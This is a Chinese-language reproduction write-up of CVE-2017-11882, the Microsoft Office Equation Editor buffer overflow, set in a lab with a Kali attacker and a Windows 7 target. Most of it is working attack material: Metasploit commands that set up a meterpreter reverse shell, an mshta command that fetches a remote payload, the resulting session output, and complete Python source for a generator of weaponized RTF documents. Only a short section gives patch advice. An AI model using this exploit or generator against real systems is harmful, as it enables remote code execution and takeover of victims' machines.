漏洞复现
漏洞概述:
此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。
影响范围:
office 2003
office 2007
office 2010
office 2013
office 2016
漏洞复现
复现环境:
渗透机:Kali Linux + POC代码
靶机:Win7 + Office 2016
过程:
root@kali:~/Desktop# cd /usr/share/metasploit-framework/modules/exploits/windows/smb
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# cp ~/Desktop/CVE-2017-11882/shell.rb CVE-2017-11882.rb
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# ls
CVE-2017-11882.rb ms06_070_wkssvc.rb
generic_smb_dll_injection.rb ms07_029_msdns_zonename.rb
group_policy_startup.rb ms08_067_netapi.rb
ipass_pipe_exec.rb ms09_050_smb2_negotiate_func_index.rb
ms03_049_netapi.rb ms10_046_shortcut_icon_dllloader.rb
ms04_007_killbill.rb ms10_061_spoolss.rb
ms04_011_lsass.rb ms15_020_shortcut_icon_dllloader.rb
ms04_031_netdde.rb ms17_010_eternalblue.rb
ms05_039_pnp.rb netidentity_xtierrpcpipe.rb
ms06_025_rasmans_reg.rb psexec_psh.rb
ms06_025_rras.rb psexec.rb
ms06_040_netapi.rb smb_delivery.rb
ms06_066_nwapi.rb smb_relay.rb
ms06_066_nwwks.rb timbuktu_plughntcommand_bof.rb
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# cd ~
root@kali:~/Desktop/CVE-2017-11882# msfconsole
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v4.16.17-dev ]
+ -- --=[ 1704 exploits - 969 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search CVE-2017-11882
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/CVE-2017-11882 normal Microsoft Office Payload Delivery
使用CVE-2017-11882.rb模块,开启Meterpreter监听会话:
msf > use exploit/windows/smb/CVE-2017-11882 #使用模块
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp #设置tcp反弹会话
payload => windows/meterpreter/reverse_tcp
msf exploit(CVE-2017-11882) > set lhost 192.168.159.131 #设置渗透机ip地址
lhost => 192.168.159.131
msf exploit(CVE-2017-11882) > set uripath 11882 #设置路径为11882,可自定义
uripath => 11882
msf exploit(CVE-2017-11882) > exploit #开启渗透,进入监听状态
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.159.131:4444
[*] Using URL: http://0.0.0.0:8080/11882
[*] Local IP: http://192.168.159.131:8080/11882
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.159.131:8080/11882"
此时,通过Xshell打开另一个ssh,生成攻击文件:
root@kali:~/Desktop/CVE-2017-11882# python CVE-2017-11882.py -c "mshta http://192.168.159.131:8080/11882" -o 11882.doc
[*] Done ! output file >> 11882.doc <<
将生成的文件拷贝到win7靶机中运行,在kalilinux中可以看到:
msf exploit(CVE-2017-11882) > [*] 192.168.159.129 CVE-2017-11882 - Delivering payload
[*] Sending stage (179267 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.131:4444 -> 192.168.159.129:49276) at 2018-03-25 11:12:17 -0400
msf exploit(CVE-2017-11882) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows WIN-445T0DU91CM\Jason @ WIN-445T0DU91CM 192.168.159.131:4444 -> 192.168.159.129:49276 (192.168.159.129)
msf exploit(CVE-2017-11882) > sessions 1 #进入会话
[*] Starting interaction with 1...
meterpreter > sysinfo #查看系统信息
Computer : WIN-445T0DU91CM
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid #查看当前用户
Server username: WIN-445T0DU91CM\Jason
meterpreter > screenshot #截屏
Screenshot saved to: /root/Desktop/CVE-2017-11882/OcONktUN.jpeg
meterpreter >
修复
- 在线更新,开启Windows Update更新。
- 打补丁,此漏洞对应的微软补丁地址:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
POC代码:
import argparse
import sys
RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9"""
RTF_TRAILER = R"""\par}
"""
OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
OBJECT_TRAILER = R"""
}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
"""
OBJDATA_TEMPLATE = R"""
01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
0000000000000000000000000000000000000000000000000000001400000000000000010043006f
006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
00000000000000000000000000000000000000000000000000000000000000010000006600000000
00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
00000000000000000000000000000000000000000000000000000000000000000000000000030004
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
414141414141414141414141414141414141414141120c4300000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000004500710075
006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
0000000000000000000000000000000000000000000000000000000000000004000000c500000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000ff
ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
7cef1800040000002d01010004000000f0010000030000000000
"""
COMMAND_OFFSET = 0x949*2
def create_ole_exec_primitive(command):
if len(command) > 43:
print "[!] Primitive command must be shorter than 43 bytes"
sys.exit(0)
hex_command = command.encode("hex")
objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
return OBJECT_HEADER + ole_data + OBJECT_TRAILER
def create_rtf(header,command,trailer):
ole1 = create_ole_exec_primitive(command + " &")
# We need 2 or more commands for executing remote file from WebDAV
# because WebClient service start may take some time
return header + ole1 + trailer
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
parser.add_argument("-c", "--command", help="Command to execute.", required=True)
parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
args = parser.parse_args()
rtf_content = create_rtf(RTF_HEADER, args.command ,RTF_TRAILER)
output_file = open(args.output, "w")
output_file.write(rtf_content)
print "[*] Done ! output file >> " + args.output +" <<"
